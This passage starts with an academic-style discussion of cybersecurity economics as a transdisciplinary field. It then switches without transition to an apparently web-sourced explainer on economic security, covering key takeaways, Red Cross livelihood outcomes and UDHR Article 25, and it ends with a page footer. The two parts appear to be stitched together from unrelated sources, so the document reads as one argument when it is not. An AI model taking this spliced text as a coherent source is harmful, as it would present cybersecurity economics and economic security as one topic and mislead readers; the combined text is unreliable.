the interacting agents in the open socio-technical systems.

Cybersecurity Economics

A fundamental issue that must be addressed is what makes cybersecurity economics a single subject of
investigation. Indeed, cybersecurity and economics each constitute distinct types of investigation, as
reflected in the fact that they have long been studied as two separate disciplines by two large
independent groups of researchers, respectively, information and computer scientists and economists.
Therefore, there might be barriers to understanding how together they constitute a single field of study.
It can be argued that cybersecurity economics should be understood as an interdisciplinary field of study
that falls between and combines cybersecurity and economics. However, this perspective faces the
problem that there is more than one conception of how different disciplines are related.
Cat [1] presented a taxonomy of possible conceptions: interdisciplinary, multidisciplinary, cross-
disciplinary, and transdisciplinary. The strategy adopted by the scholars in this field is closest to
the transdisciplinarity (i.e., a synthetic creation that encompasses work from different disciplines), which
treats cybersecurity and economics as two different relatively independent systems of thinking that
interact in a complex socio-technical system. A complex socio-technical system paradigm takes the
interaction of different systems as the starting point and explains their relative interdependence
regarding how they interact in social and technical settings. This paradigm enables us to capture the
transformative effects that cybersecurity and economics might each have on one another[2]. To develop
a more clear understanding of these effects, this section continues to elaborate on how cybersecurity
started to draw from economics.

Insights in the field of cybersecurity economics empower decision-makers to make informed decisions
that improve their evaluation and management of situations that may lead to catastrophic
consequences and threaten the sustainability of digital ecosystems. By drawing on these insights,
cybersecurity practitioners have been able to respond to many complex problems that have emerged
within the context of cybersecurity over the last two decades. The academic field of cybersecurity
economics is highly interdisciplinary since it combines core findings and tools from disciplines such
as sociology, psychology, law, political science, and computer science.

Broadly construed, economic security is the ability of people to meet their needs
consistently. It is connected to both the concept of economic well-being and the notion of
the modern welfare state, a governmental entity that commits itself to providing baseline
guarantees for its citizens’ security.1

Attempts to ensure economic security are meant to serve as a check against instability in
the market, which scholars say has become more important in the years since the fall of
the Soviet Union and the predominance of market capitalism. It may be even more relevant
in light of declining labor bargaining power since the 1970s in post-industrial economies,
such as the United States, and economic insecurity caused by COVID-19.

KEY TAKEAWAYS

 Economic security refers to the ability of people to meet their needs consistently.
 The concept is important for individuals and nations, where it is a factor in
assessing national security, and it’s connected to the concept of economic well-
being.
 Cultural standards are involved in determining economic security.
 Climate change, growing fears and anxieties around the globe, COVID-19, and big
technological changes have increased economic insecurity significantly in recent
years.

Understanding Economic Security


“Economic security” can be understood as a term for how well people are able to regularly
meet their needs. “Economic insecurity,” its opposite, happens when there aren’t enough
resources to pay for food, housing, medical care, and other essentials.2

Cultural standards play a role in determining what’s included in the list of essentials for
economic security, meaning that both what counts as economic security and how it is
worked out have changed over time. The International Committee of the Red Cross, an
organization that tries to improve economic security globally, has identified five key
livelihood outcomes to track economic security:

 Food consumption
 Food production
 Living conditions
 Income
 The capacity of civil society organizations and the government to meet people’s
needs3

Indeed, economic security relies on the perception of security in addition to quantifiable


material or financial conditions. Economic security can be captured in numerous ways
depending on the level of analysis under consideration, ranging from the effects of foreign
investments on national economics to the ability of laborers to access health insurance.
Notably, researchers for the United Nations have said that the measurements for economic
security do not adequately capture volatility.4

In Article 25, the United Nations’ Universal Declaration of Human Rights delineates the
right to a reasonable standard of living and to “security in the event of unemployment,
sickness, disability, widowhood, old age or other lack of livelihood in circumstances beyond
[their] control

economic security important?


Without basic economic security, people cannot plan for their future or the future of their
children. The lack of security will harm people’s quality of life and lessen innovation and
trust in institutions.4 Financial anxieties and feelings of economic insecurity have many
other negative outcomes, such as prolonging how long victims of domestic abuse will stay
with an abuser.

You might also like